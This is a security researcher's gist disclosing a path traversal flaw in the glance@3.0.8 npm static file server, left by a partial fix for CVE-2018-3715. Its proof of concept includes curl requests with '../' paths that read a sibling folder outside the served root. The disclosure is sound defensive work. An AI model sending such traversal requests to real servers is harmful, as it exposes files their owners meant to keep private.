Skip to content

Instantly share code, notes, and snippets.

@lirantal
Created September 26, 2022 21:53
Show Gist options
  • Save lirantal/c8cfb0398c78e558b7d4ac02aae67809 to your computer and use it in GitHub Desktop.
Save lirantal/c8cfb0398c78e558b7d4ac02aae67809 to your computer and use it in GitHub Desktop.
Path Traversal in glance@3.0.8

Path traversal vulnerability in glance@3.0.8

glance is a local HTTP file server, or as is it describes itself: a quick disposable http server for static files.

Observation:

  • It only gets about 150 downloads a month
  • It was last published at 19th of July 2020, two years ago.

Resources:

Background on exploitation

The glance npm package was previously vulnerable to Directory Traversal as reported via CVE-2018-3715, yet the fix that was applied to mitigate this vulnerability was partial and allowed room for further attacks to be employed on users of this library.

This vulnerability should probably be classified as a CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').

Proof of Concept exploit

  1. Install the latest version of glance
  2. Make sure you have a public/ directory with files in it
  3. Make sure you have a public-isprivate directory with files in it
  4. Make sure you have a private/ directory with files in it

All directories above should share the same relative parent, meaning the directory structure should look as follows:

.
├── private
│   └── index.html
├── public
│   └── index.html
└── public-isprivate
    └── index.html

Then, run glance as follows which sets the public root directory to the public/ directory that we previously created:

npx glance --dir "public" --verbose

The above should run within the local folder where all private/, public/, and public-isprivate are subfolders.

Next, verify the following:

  1. curl --path-as-is "http://localhost:8080/../private/index.html" -> this request is denied, as expected with prior vulnerability fix.
  2. curl --path-as-is "http://localhost:8080/../public/index.html" -> this request is allowed, as expected with the functionality of this local http server
  3. curl --path-as-is "http://localhost:8080/../public-isprivate/index.html" -> this request SHOULD BE DENIED because it is outside the public/ folder, but it is actually allowed.

Case (3) shouldn't happen, but it does, due to an improper fix in the library's source code.

Author

Liran Tal

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment